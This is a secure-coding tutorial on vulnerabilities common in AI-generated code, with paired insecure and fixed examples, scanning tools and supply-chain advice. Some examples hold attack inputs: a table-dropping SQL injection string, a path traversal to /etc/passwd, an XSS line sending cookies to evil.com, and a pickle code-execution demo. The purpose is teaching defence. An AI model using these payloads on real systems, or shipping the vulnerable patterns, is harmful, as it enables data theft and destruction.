# Security in AI-Assisted Coding

## Why Security Matters More with AI Code
AI coding assistants generate code by predicting statistically likely patterns from training data. This training data includes millions of repositories — many of which contain insecure code, outdated practices, and even known vulnerabilities.
Studies show that AI-generated code contains security vulnerabilities in approximately 40% of cases when developers don't specify security requirements in their prompts. AI models optimize for functional correctness, not security by default.
Imagine a chef trained by watching every cooking video on the internet — including ones with bad hygiene practices. The chef can make delicious-looking food, but if you don't specifically ask for food safety compliance, they might skip hand-washing. AI code generation works the same way: you must explicitly request secure coding practices.
## Common Security Vulnerabilities in AI-Generated Code

### 1. SQL Injection
AI models frequently generate code that concatenates user input directly into SQL queries instead of using parameterized queries.
❌ Insecure (AI often generates this):

```python
# VULNERABLE: SQL injection
@app.get("/users")
def search_users(name: str):
    query = f"SELECT * FROM users WHERE name = '{name}'"
    result = db.execute(query)
    return result.fetchall()

# Attack: name = "'; DROP TABLE users; --"
```
✅ Secure (what you should require):

```python
# SAFE: Parameterized query
from sqlalchemy import text

@app.get("/users")
def search_users(name: str):
    query = text("SELECT * FROM users WHERE name = :name")
    result = db.execute(query, {"name": name})
    return result.fetchall()
```
Even better with an ORM:

```python
# SAFE: SQLAlchemy ORM
@app.get("/users")
def search_users(name: str, db: Session = Depends(get_db)):
    return db.query(User).filter(User.name == name).all()
```
SQL injection has ranked at or near the top of web application vulnerability lists for over two decades. AI models, trained on older code, frequently produce injectable queries. Always use parameterized queries or an ORM.
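The difference is easy to demonstrate end to end with Python's built-in `sqlite3` driver (a self-contained sketch, separate from the FastAPI snippets above):

```python
import sqlite3

# In-memory database with one row, to show why placeholders matter
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")

def search_users(name: str):
    # The ? placeholder makes the driver treat `name` strictly as data,
    # never as SQL, so injection payloads match nothing
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)
    ).fetchall()

print(search_users("alice"))        # [('alice',)]
print(search_users("' OR '1'='1"))  # [] — the payload is just an odd name
```

With string concatenation, the second call would have returned every row in the table.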
### 2. Hardcoded Secrets and Credentials
AI models often include placeholder credentials that developers forget to replace:
❌ Insecure:

```python
# VULNERABLE: Hardcoded credentials
DATABASE_URL = "postgresql://admin:password123@db.example.com:5432/production"
API_KEY = "sk-1234567890abcdef"
JWT_SECRET = "super-secret-key"

def get_db():
    return create_engine(DATABASE_URL)
```
✅ Secure:

```python
# SAFE: Environment variables
import os

from dotenv import load_dotenv

load_dotenv()

# os.getenv returns None when a variable is unset, so the startup
# check in get_db() can fire with a clear error message
DATABASE_URL = os.getenv("DATABASE_URL")
API_KEY = os.getenv("API_KEY")
JWT_SECRET = os.getenv("JWT_SECRET")

def get_db():
    if not DATABASE_URL:
        raise RuntimeError("DATABASE_URL environment variable is not set")
    return create_engine(DATABASE_URL)
```
### 3. Insecure Deserialization
AI may suggest using pickle to load untrusted data — a critical vulnerability:
❌ Insecure:

```python
import pickle

# VULNERABLE: Loading untrusted pickle data
def load_model(file_path: str):
    with open(file_path, "rb") as f:
        return pickle.load(f)  # Can execute arbitrary code!
```
✅ Secure:

```python
import joblib
import hashlib

# SAFE: Verify integrity before loading
EXPECTED_HASH = "sha256:a1b2c3d4..."

def load_model(file_path: str):
    with open(file_path, "rb") as f:
        data = f.read()
    file_hash = f"sha256:{hashlib.sha256(data).hexdigest()}"
    if file_hash != EXPECTED_HASH:
        raise ValueError("Model file integrity check failed")
    return joblib.load(file_path)
```
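To see why `pickle.load` on untrusted data is exploitable, consider this deliberately harmless proof of concept: pickle lets any class dictate what code runs when it is deserialized.

```python
import pickle

class Evil:
    def __reduce__(self):
        # On pickle.loads, this calls eval("6 * 7") — a real attacker
        # would return something like (os.system, ("malicious command",))
        return (eval, ("6 * 7",))

payload = pickle.dumps(Evil())
result = pickle.loads(payload)  # runs eval(); no Evil instance is created
print(result)  # 42
```

The attacker controls the bytes, so the attacker controls what gets called. This is why hash-verified or signed artifacts are the minimum bar for loading serialized models.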
### 4. Path Traversal
AI-generated file handling code often doesn't validate paths:
❌ Insecure:

```python
# VULNERABLE: Path traversal
@app.get("/files/{filename}")
def get_file(filename: str):
    file_path = f"/uploads/{filename}"
    return FileResponse(file_path)

# Attack: filename = "../../etc/passwd"
```
✅ Secure:

```python
from pathlib import Path

UPLOAD_DIR = Path("/uploads").resolve()

@app.get("/files/{filename}")
def get_file(filename: str):
    safe_path = (UPLOAD_DIR / filename).resolve()
    if not safe_path.is_relative_to(UPLOAD_DIR):  # requires Python 3.9+
        raise HTTPException(status_code=400, detail="Invalid file path")
    if not safe_path.exists():
        raise HTTPException(status_code=404, detail="File not found")
    return FileResponse(safe_path)
```
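The resolve-then-check pattern is worth isolating into a reusable helper so it can be unit-tested on its own (a sketch; `resolve_upload` is a hypothetical name, not a library function):

```python
from pathlib import Path

def resolve_upload(base: str, filename: str) -> Path:
    """Resolve filename inside base, rejecting traversal attempts."""
    base_dir = Path(base).resolve()
    # resolve() collapses any ../ segments before the containment check
    candidate = (base_dir / filename).resolve()
    if not candidate.is_relative_to(base_dir):  # requires Python 3.9+
        raise ValueError("path escapes the upload directory")
    return candidate

print(resolve_upload("/uploads", "report.pdf"))  # /uploads/report.pdf
try:
    resolve_upload("/uploads", "../../etc/passwd")
except ValueError as exc:
    print(exc)  # path escapes the upload directory
```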
### 5. Missing Input Validation
AI often generates the "happy path" without validating inputs:
❌ Insecure:

```python
# VULNERABLE: No input validation
@app.post("/transfer")
def transfer_money(data: dict):
    from_account = data["from"]
    to_account = data["to"]
    amount = data["amount"]
    db.execute(f"UPDATE accounts SET balance = balance - {amount} WHERE id = {from_account}")
    db.execute(f"UPDATE accounts SET balance = balance + {amount} WHERE id = {to_account}")
    return {"status": "success"}
```
✅ Secure:

```python
from pydantic import BaseModel, Field, validator

class TransferRequest(BaseModel):
    from_account: int = Field(..., gt=0)
    to_account: int = Field(..., gt=0)
    amount: float = Field(..., gt=0, le=10000)

    @validator("to_account")  # Pydantic v1 syntax; v2 uses @field_validator
    def accounts_must_differ(cls, v, values):
        if "from_account" in values and v == values["from_account"]:
            raise ValueError("Cannot transfer to the same account")
        return v

@app.post("/transfer")
def transfer_money(request: TransferRequest, db: Session = Depends(get_db)):
    with db.begin():
        sender = (
            db.query(Account)
            .filter(Account.id == request.from_account)
            .with_for_update()
            .first()
        )
        if not sender or sender.balance < request.amount:
            raise HTTPException(status_code=400, detail="Insufficient funds")
        sender.balance -= request.amount
        receiver = (
            db.query(Account)
            .filter(Account.id == request.to_account)
            .with_for_update()
            .first()
        )
        if not receiver:
            # Raising inside db.begin() rolls back the sender debit
            raise HTTPException(status_code=404, detail="Receiver account not found")
        receiver.balance += request.amount
    return {"status": "success", "new_balance": sender.balance}
```
### 6. Cross-Site Scripting (XSS)
AI may generate web code that doesn't escape user input:
❌ Insecure:

```python
# VULNERABLE: XSS via unescaped HTML
@app.get("/profile/{username}")
def show_profile(username: str):
    return HTMLResponse(f"<h1>Welcome, {username}!</h1>")

# Attack: username = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"
```
✅ Secure:

```python
from markupsafe import escape

@app.get("/profile/{username}")
def show_profile(username: str):
    safe_name = escape(username)
    return HTMLResponse(f"<h1>Welcome, {safe_name}!</h1>")
```
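If you'd rather avoid the `markupsafe` dependency, the standard library's `html.escape` gives equivalent protection for this case:

```python
import html

payload = "<script>alert('xss')</script>"
# Escapes &, <, >, and (by default) both quote characters
safe = html.escape(payload)
print(safe)  # &lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;
```

The browser then renders the payload as inert text instead of executing it.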
## OWASP Top 10 and AI-Generated Code
The OWASP Top 10 is the standard reference for web application security risks. Here's how AI-generated code intersects with each:
| OWASP Risk | AI Relevance | Risk Level |
|---|---|---|
| A01: Broken Access Control | AI rarely generates authorization checks unless asked | 🔴 Critical |
| A02: Cryptographic Failures | AI may use weak algorithms (MD5, SHA1 for passwords) | 🔴 Critical |
| A03: Injection | SQL, NoSQL, command injection from string concatenation | 🔴 Critical |
| A04: Insecure Design | AI generates code, not architecture — missing security design | 🟡 High |
| A05: Security Misconfiguration | Debug mode on, default credentials, verbose errors | 🟡 High |
| A06: Vulnerable Components | AI may suggest outdated or vulnerable packages | 🔴 Critical |
| A07: Auth Failures | Weak password policies, missing rate limiting, session flaws | 🟡 High |
| A08: Data Integrity Failures | Insecure deserialization (pickle), missing integrity checks | 🟡 High |
| A09: Logging Failures | AI often omits logging; may log sensitive data when it does | 🟢 Medium |
| A10: SSRF | AI-generated URL fetching without validation | 🟡 High |
## Code Scanning and Security Tools

Never rely solely on manual review. Use automated tools to catch vulnerabilities:

### Python-Specific Tools
| Tool | What It Scans | Integration |
|---|---|---|
| Bandit | Python-specific security issues (eval, pickle, SQL) | CLI, CI/CD, pre-commit |
| Safety | Known vulnerabilities in installed packages | CLI, CI/CD |
| pip-audit | Package vulnerability database (PyPI) | CLI, GitHub Actions |
| mypy | Type errors that can lead to security issues | CLI, IDE, CI/CD |
### General-Purpose Tools
| Tool | What It Scans | Language Support |
|---|---|---|
| Snyk | Dependencies + code vulnerabilities | Python, JS, Java, Go, ... |
| SonarQube | Code quality + security vulnerabilities | 30+ languages |
| Semgrep | Custom static analysis rules | Python, JS, Go, Java, ... |
| Trivy | Container images + IaC + filesystem | Universal |
| CodeQL | Deep semantic code analysis | Python, JS, Java, C/C++, Go |
### Example: Running Bandit on AI-Generated Code
```bash
# Install bandit
pip install bandit

# Scan a single file (no -r needed for a file target)
bandit my_ai_generated_code.py

# Scan entire project, reporting medium severity and above
bandit -r ./src -ll

# Generate a JSON report
bandit -r ./src -f json -o security_report.json
```
Example Bandit output:

```text
>> Issue: [B608:hardcoded_sql_expressions] Possible SQL injection vector
   Severity: Medium   Confidence: Low
   Location: ./api/routes.py:42
   More Info: https://bandit.readthedocs.io/en/latest/plugins/b608
41      def search_users(name: str):
42          query = f"SELECT * FROM users WHERE name = '{name}'"
43          result = db.execute(query)
```
### Integrating Security Scanning into Your Workflow
*(Diagram: security scanning pipeline)*
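As a sketch of what such a pipeline can look like, a CI step might gate merges on the scanners from the tables above (a hypothetical configuration fragment; adjust paths and tool selection to your project):

```shell
#!/bin/sh
# Fail the build on the first scanner that reports problems
set -e

bandit -r ./src -ll   # static analysis, medium+ severity
pip-audit             # known CVEs in installed dependencies
safety check          # second opinion on dependency CVEs
```

Running the same commands in a pre-commit hook catches issues before they ever reach CI.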
## Supply Chain Attacks

### The Risk of AI-Suggested Packages
AI models can suggest packages that:
- Don't exist — attackers can register these names with malicious code ("dependency confusion")
- Are typosquats — names one typo away from popular packages (e.g., `reqeusts` vs `requests`)
- Are deprecated — no longer maintained, with known vulnerabilities
- Are compromised — legitimate packages whose maintainer accounts were hacked
### How to Verify a Package

Before running `pip install` on any AI-suggested package:
```bash
# 1. Check that it exists and list available versions
pip index versions package-name

# 2. Check on the PyPI website
#    https://pypi.org/project/package-name/

# 3. Look at download statistics (should be high for legitimate packages)
#    https://pypistats.org/packages/package-name

# 4. Check the GitHub repository linked from PyPI:
#    - Does it have stars?
#    - When was it last updated?
#    - Does the author maintain other known packages?
```
In December 2022, a malicious `torchtriton` package was uploaded to PyPI, shadowing a dependency of PyTorch nightly builds (a dependency-confusion attack). Users who installed the nightly build via pip pulled in the malicious version, which stole SSH keys, AWS credentials, and other sensitive files. Always verify packages before installing.
### Checklist: Before Installing an AI-Suggested Package
- Verify the package exists on PyPI
- Check the download count (major packages have millions of downloads)
- Verify the author/maintainer is credible
- Check when it was last updated (avoid abandoned packages)
- Read the GitHub README and issues
- Check for known vulnerabilities: `pip-audit` or `safety check`
- Compare the exact package name (watch for typosquatting)
- Pin the version in your requirements file
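The typosquatting check can be partly scripted against an allowlist with the standard library's `difflib` (a sketch; the package list here is illustrative, and in practice you would maintain your organization's own list):

```python
import difflib

# Illustrative allowlist of packages you already trust
POPULAR = ["requests", "numpy", "pandas", "flask", "django", "sqlalchemy"]

def possible_typosquat(name: str):
    """Return the trusted package `name` resembles, or None if it looks fine."""
    if name in POPULAR:
        return None  # exact match: the real package
    # cutoff=0.8 flags names that are only a typo or two away
    close = difflib.get_close_matches(name, POPULAR, n=1, cutoff=0.8)
    return close[0] if close else None

print(possible_typosquat("reqeusts"))  # requests — suspicious!
print(possible_typosquat("requests"))  # None
print(possible_typosquat("leftpadx"))  # None — just unknown, verify manually
```

A `None` result for an unknown name is not a clean bill of health; it only means the name doesn't resemble anything on the allowlist.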
## Data Privacy When Using AI Tools

### What Data Gets Sent to AI Providers
When you use AI coding tools, your code is sent to external servers for processing:
| Tool | Data Sent | Data Retention | Can Opt Out? |
|---|---|---|---|
| GitHub Copilot | Current file + context | Not used for training (Business) | Yes (Business plan) |
| ChatGPT | Everything you paste | May be used for training (Free) | Yes (opt out in settings) |
| Cursor | Files + project context | Varies by plan and model | Privacy mode available |
| CodeWhisperer | Current file | Not shared (Professional) | Yes |
Never paste the following into AI chat tools:
- API keys, passwords, or tokens
- Customer data or PII (Personally Identifiable Information)
- Proprietary algorithms or trade secrets
- Internal infrastructure details (IPs, hostnames, credentials)
- Data subject to compliance requirements (HIPAA, PCI-DSS, GDPR)
### Mitigation Strategies
| Strategy | Description |
|---|---|
| Use enterprise plans | Business plans typically don't train on your code |
| Sanitize before prompting | Replace real secrets with placeholders before pasting |
| Self-hosted models | Run open-source models locally (Ollama + CodeLlama, DeepSeek) |
| Code review policies | Require human review of all AI-generated code |
| DLP tools | Use Data Loss Prevention tools to detect leaked secrets |
### How to Sanitize Code Before Prompting
```python
# BEFORE SENDING TO AI (your actual code):
DATABASE_URL = "postgresql://prod_admin:X7$kL9mN@db.mycompany.com:5432/customers"
STRIPE_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"

# AFTER SANITIZING (what you send to AI):
DATABASE_URL = "postgresql://user:password@hostname:5432/dbname"
STRIPE_KEY = "sk_live_XXXXXXXXXXXXXXXXXXXX"
```
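The substitution can be partly automated with a few regexes before text leaves your machine (a sketch: the two patterns cover only the secret formats shown above, and real DLP tooling is far broader):

```python
import re

# Hypothetical sanitizer for the two secret formats shown above
PATTERNS = [
    (re.compile(r"sk_live_[A-Za-z0-9]+"), "sk_live_XXXXXXXX"),
    (re.compile(r"postgresql://[^@\s]+@[^/\s]+"),
     "postgresql://user:password@hostname:5432"),
]

def sanitize(snippet: str) -> str:
    for pattern, placeholder in PATTERNS:
        snippet = pattern.sub(placeholder, snippet)
    return snippet

code = 'STRIPE_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"'
print(sanitize(code))  # STRIPE_KEY = "sk_live_XXXXXXXX"
```

Run it over anything you are about to paste; a regex pass costs nothing and catches the embarrassing cases.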
## Intellectual Property Concerns

### Key Questions for AI-Generated Code
| Question | Consideration |
|---|---|
| Who owns AI-generated code? | Varies by jurisdiction — generally the developer/company |
| Can AI reproduce copyrighted code? | Yes — AI may reproduce GPL/AGPL code verbatim |
| License contamination? | If AI copies GPL code into your MIT project, you may have a problem |
| Patent risks? | AI may generate code that infringes on software patents |
### Best Practices for IP Protection
- Enable code reference detection — GitHub Copilot can flag when suggestions match public code
- Use license-aware tools — Some tools filter out suggestions from copyleft repos
- Document AI usage — Keep records of what was AI-generated for legal clarity
- Review for uniqueness — If a suggestion looks too specific, search for the source
- Follow your organization's AI policy — Many companies have specific guidelines
## Secure Coding Checklist for AI-Generated Code

Use this comprehensive checklist every time you integrate AI-generated code:

### Authentication & Authorization
- All endpoints require authentication unless explicitly public
- Authorization checks verify the user has permission for the specific resource
- Passwords are hashed with bcrypt/argon2 (not MD5/SHA1)
- JWT tokens have appropriate expiration times
- Rate limiting is applied to auth endpoints
### Input Validation
- All user inputs are validated (type, length, format, range)
- SQL queries use parameterized statements or ORM
- File paths are validated against path traversal
- URLs are validated before fetching (SSRF prevention)
- HTML output is escaped to prevent XSS
### Data Protection
- No hardcoded credentials, API keys, or secrets
- Sensitive data is encrypted at rest and in transit
- Logs don't contain passwords, tokens, or PII
- Error messages don't leak internal implementation details
- Database connections use TLS/SSL
### Dependencies
- All packages exist on PyPI/npm and are legitimate
- Package versions are pinned in requirements files
- No known vulnerabilities (checked with pip-audit/safety)
- No unnecessary dependencies (minimize attack surface)
### Error Handling
- Exceptions are caught and handled appropriately
- Generic error messages are returned to users (no stack traces)
- Detailed errors are logged server-side for debugging
- Application doesn't crash on unexpected input
## Security-Focused Prompting
To get more secure code from AI, explicitly request security in your prompts:
❌ Insecure prompt:

```text
Write a login endpoint for FastAPI
```
✅ Security-focused prompt:

```text
Write a secure login endpoint for FastAPI that:
- Uses bcrypt for password verification
- Returns JWT tokens with 15-minute expiry
- Implements rate limiting (5 attempts per minute per IP)
- Returns generic "Invalid credentials" for both wrong email and wrong password
- Logs failed attempts without logging the attempted password
- Uses constant-time comparison for password verification
- Sets secure, HTTP-only cookie flags for the token
```
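One requirement in that prompt, constant-time comparison, is worth knowing how to verify yourself, since Python ships it in the standard library:

```python
import hashlib
import hmac

def verify_token(supplied: str, expected: str) -> bool:
    # `==` on strings can short-circuit at the first differing character,
    # leaking timing information; hmac.compare_digest examines every byte
    # regardless of where the mismatch occurs
    return hmac.compare_digest(supplied, expected)

expected = hashlib.sha256(b"correct-token").hexdigest()
print(verify_token(hashlib.sha256(b"correct-token").hexdigest(), expected))  # True
print(verify_token(hashlib.sha256(b"wrong-token").hexdigest(), expected))    # False
```

If AI-generated auth code compares secrets with plain `==`, that is one of the things to flag in review.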
## Key Takeaways
| Concept | Summary |
|---|---|
| AI security risk | ~40% of AI-generated code contains vulnerabilities when security isn't specified |
| Top vulnerabilities | SQL injection, hardcoded secrets, path traversal, XSS, insecure deserialization |
| OWASP alignment | AI code frequently triggers OWASP Top 10 categories |
| Scanning tools | Bandit, Snyk, SonarQube, Semgrep, pip-audit |
| Supply chain | Verify all AI-suggested packages before installing |
| Data privacy | Never paste secrets, PII, or proprietary code into AI tools |
| IP concerns | AI may reproduce copyrighted code — enable reference detection |
| Secure prompting | Explicitly request security requirements in every prompt |